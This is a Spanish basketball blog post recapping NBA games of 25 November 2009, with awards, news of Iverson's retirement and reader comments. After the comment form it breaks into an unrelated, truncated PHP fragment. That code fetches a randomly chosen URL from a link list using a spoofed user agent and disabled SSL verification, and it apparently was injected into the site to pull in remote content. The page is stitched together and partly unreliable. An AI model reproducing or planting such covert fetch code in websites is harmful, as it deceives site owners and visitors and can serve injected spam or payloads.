La Crónica (25/11/2009)

26 de November de 2009 por MagicJohnson32

Noche intensa donde se jugaban las castañas muchos de los favoritos… como también algunos  de los equipos más calamidad que podamos encontrar en nuestras vidas. Con tan extensa muestra de partidos es interesante retomar el eterno debate East Vs West donde se observaba a priori un más que evidente cambio de tendencia. Anoche los equipos del Oeste anotaron de media 10 puntos más que los equipos del Este y eso que contabilizamos uno de los mejores partido de la historia de los Bobcats (que no es habitual que este equipo suba la media, vamos). No es que sea un dato trascendentalmente significativo y menos a estas alturas de la temporada. Sólo refleja la filosofía tradicional de ambas conferencias, aunque tan sólo se traduce en que el Oeste gana un 53% de los partidos y el Este un 47%. En cualquier caso la teórica superioridad del Este no se manifiesta en ningún sitio, al menos de momento.

Los dos equipos con más victorias (12) pertenecen a la conferencia Oeste. Los Suns se merendaron a los Grizzlies. Los “Ositos” anotan mucho y bien, tanto o más que los Lakers por poner un ejemplo ilustre, pero su defensa es una lástima donde un equipo como los Suns no tiene ni por donde empezar. Los Blazers son el otro equipo con más victorias pero a pesar de su excelente defensa tuvieron problemas para doblegar a unos paupérrimos Nets que están a sólo 2 derrotas del inicio más patético de la historia. Sus próximos partidos en Sacramento, L.A, Dallas… En los Blazers, Oden está en un momento bestial, cuidado.Continuando con los gallos del Oeste que jugaron anoche los Mavs apalizaron nuevamente a los siempre complicados Rockets, con Nowitzki, Terry y Tim Thomas anotando 75 puntos de los 130, con un acierto de más del 70%. Excelente guinda para la 2ª plaza de los más prolíficos pasadores de la historia que alcanzó anoche Jason Kidd en detrimento de Marc Jackson. Nos hace falta recordar de vez en cuando lo extraordinario que ha sido este crack. Por desgracia para él la primera en manos de Stockton será absolutamente inalcanzable. Por último, los Nuggets ganaron fácilmente a la banda que viste la camiseta de los Wolves.

Los gallos del Este no tuvieron una noche tan plácida como los del Oeste. Los Celtics tiraron de experiencia para ganar a unos Sixers inoperantes. Los Cavs tampoco se pudieron relajar demasiado frente a unos Pistons casi tan malos como los Sixers. Pero es que los Magic se vieron sorprendidos en su propia casa cuando lo tenían todo a favor. Un solemne tapón de Wade a Vince y una polémica canasta con posible goaltending de Beasley rematando un rebote a fallo del propio Wade tuvieron la culpa. Algo falla en el equipo azulón. La distribución de pesos específicos en el equipo sigue sin tener ni pies ni cabeza. 5 tiros DH y 19 VC. Que tenga que salir el resucitado Jason Williams para sacarles las castañas del fuego no tiene nombre.

Moviéndonos en círculos más modestos hay que destacar el emocionante partido en New Orleans frente a Milwaukee. Por primera vez otro rookie le moja bien la oreja a Jennings. Darren Collison es el hombre orquesta en estos Hornets, por encima incluso de West. El partido fue un rato malo, entre equipos con problemas (los Bucks los tienen desde que se lesionó Bogut) pero se resolvió en la prórroga y pudimos asistir al buzzer de Collison. Finalizando, duelísimo de Parker Vs Monta Ellis que se terminaron llevando los Spurs, palizón de Larry Brown a la lamentable defensa de Jay Triano, victoria sin despeinarse de los Pacers frente a los Clippers, y victoria de los Kings ante los Knicks con audaz actuación de Sergio incluída (¿no queríais sopa? pues sólo Tyreke lanzó más que él a canasta… que eso tampoco es, chacho)

PREMIOS

MVP: Obviemos a Lebron James, como siempre a un paso del triple doble. Centrémonos en la pareja Parker-Duncan, inmesa ante los Warriors, en Gerald Wallace y sus 31 puntos, 13 rebotes pasando por encima de Toronto, en David West (27-10-5), clave en la victoria frente los Bucks o en Paul Pierce y sus 27 puntos en 10 de 15 en tiros de campo.

Rookie: Aprovechando un mini-bajón de Jennings, Tyreke Evans se postula como la tercera vía (esperando a la segunda que está lesionada). Ayer se volvió a quedar cerquita del triple doble con 17 puntos, 11 rebotes y 7 asistencias. Desde la lesión de Chris Paul también destaca Darren Collison con actuaciones magistrales como la de ayer. 18 puntos, 7 rebotes, 8 asistencias y canasta decisiva para mandar el partido a la prórroga. Gerald Henderson, Jonny Flynntambién jugaron un buen partido.

Sorpresa: Tantos partidos dan lugar a muchísimas sorpresas. Por ejemplo los buenos partidos de Baron Davis con 25 puntos, Jason Williams (25-8), Hackim Warrick (22-10), Corey Brewer (22-13), Tim Thomas (23 puntitos) y… ¡Sergio Rodríguez! Cuidadín que el canario ha jugado 32 minutos aprovechando la baja de Udrih y ha anotado 15 puntos, cogido 4 rebotes, repartido 4 asistencias y robado 2 balones. Para ser la actuación perfecta sólo le ha faltado controlar las pérdidas (4) y tirar un poco mejor (4 de 13).

Decepción: No estamos acostumbrados a que Calderón pierda 6 balones en un partido, así que le vamos a catalogar como decepción de la noche personalizando a todos los Raptors que perdieron contra uno de los equipos más tristes de la liga. Además hay que mencionar el 2 de 15 de Al Thorton (hace poco hablábamos de su inconsistencia) y el 3 de 15 de Rashard Lewis

Esfuerzo en vano: 15-21 de Marcus Camby, 42 puntos de Monta Ellis, 25-9-9 de Andre Iguodala, 23-7-10 de Luke Ridnour, 32-14 de Brook Lopez… Brutales actuaciones sin el premio de la victoria.

LA NOTICIA DEL DÍA

Sin duda la noticia del día es la retirada de Allen Iverson. Se va (temporalmente) un jugador único, capaz de despertar grandes antipatias pero también de hacer levantar del asiento a medio mundo. Seguramente aún le queda mucho gasolina dentro pero su nula voluntad de adaptación a los nuevos tiempos ha provocado una despedida un tanto triste.

RAZONES PARA TRASNOCHAR

Esta noche se disputarán dos partidos, un duelo de presente y uno de pasado. El del presente es un Orlando Magic @ Atlanta Hawks con ambos equipos situados lo alto del Este; de hecho, los de Georgia defienden el liderato de la conferencia ante los últimos campeones de la misma. Será a las 2h00. El del pasado es un Chicago Bulls @ Utah Jazz. Sin Jordan ni Pippen, sin Malone ni Stockton, de aquellas Finales nos quedan Sloan y los recuerdos. Esta noche, a partir de las 4h30, podremos disfrutar sin embargo de Deron Williams y Derrick Rose, que tampoco son mancos.

VIDEO

Tony Parker demostrando que es de los mejores penetradores de la competición sino el mejor, Rajon Rondo efectuando un movimiento elegantísimo, Darren Collison mandando el partido a la prórroga, Michael Beasley anotando la polémica canasta ganadora del Magic-Heat… Para todos los gustos.

Comenta

9 comentarios a esta entrada

  1. M dice:
    #1

    Que pena lo de Iverson, y me ha sorprendido mucho y bien lo de Sergio, a ver si puede ser regular (y le dejan)

      Citar

  2. fmneyo dice:
    #2

    Gran blog!! enhorabuena por ello, que grata sorpresa encontrarme algo así por internet. Os leeré diariamente 🙂

      Citar

  3. arivas dice:
    #3

    Sin duda es el momento de Sergio. Tras estos dos bueno partidos veremos cual es la respuesta (en minutos) cuando vuelva a estar sano Udrih, parece su último tren.

      Citar

  4. Love Denise dice:
    #4

    para mí el anterior partido de sergio´SÍ fue bueno, pero el de hoy no tanto, creo que Sergio no tiene “peso” dentro del equipo ni “muñeca” como para tirarse 13 tiros, y más cuando sólo ha metido 4, comprendo que para una vez que le dan minutos, intente demostrar cosas, pero tirarse 13 tiros cuando no te están entrando, es al menos, como para hacerselo mirar. Por otra parte, se me antoja demasiado perder 4 balones en media hora contra la banda de los Knicks, que no defienden nada.

    Volviendo a los Raptors, creo que el futuro de esta franquicia pinta negro, Bosh se irá, y se comerán con patatas los contratazos de los sobrevalorados Turkoglu, Calderón, Bargnani y Jack (aprox.150 millones en los próximos 6 años en estos 4 jugadores).

      Citar

  5. Gorka dice:
    #5

    wenass a todos, llevo como dos meses leyendo este blog diariamente y quería decir que me parece la ostia!! Sobre esta jornada me gustaría comentar que me esta sorprendiendo como se estan defendiendo los hornets sin CP3. Sobre sergio decir que me parece que esto es anecdotico, ya que estando udrih a buen nivel a mi me parece que debe jugar. Weno pues eso, saludos a todos, agur

      Citar

  6. Fran Reyes dice:
    #6

    Sergio hace cada año un par de partidos buenísimos, posibles puntos de inflexión, que al final quedan en nada. En esta ocasión, sin embargo, tiene una ocasión inmejorable para consolidar su buen hacer: el puesto de base / escolta de Sacramento es más bien malo. Martin es una estrella pero está lesionado, Evans es un rookie solvente y titular fijo. Y, entre Udoka, Udrih y Sergio… pues los tres son iguales: medianías, irregulares, cualquiera puede ser titular en esa terna. A Sergio no le queda sino aprovechar los muchos minutos de que va a disponer.

      Citar

  7. xapa_croack dice:
    #7

    Pues mas de 5500 as le quedan al bueno de kidd para superar al gran stockton.

    Iverson si quieren que le recuerden, deberia devolver el dinero a al gente que se ha comprado su camiseta de memphis, o alegara que tiene muchos hiphoperos que alimentar….

      Citar

  8. Viva_Dirk dice:
    #8

    Muchas gracias por seguirnos Gorka, y mas por animarte a comentar.

    A mi Sergio me parece cualquier cosa menos una medianía, la verdad.

      Citar

  9. Fran Reyes dice:
    #9

    @ Viva_Dirk

    Me estoy refiriendo a medianía en cuanto a nivel. En este caso, es distinto el ser una medianía del ser un jugador gris: al contrario, Sergio Rodríguez es un jugador brillante sobre el parqué. Eso sí: su rendimiento, aunque nos disguste, es el de un jugador del montón.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>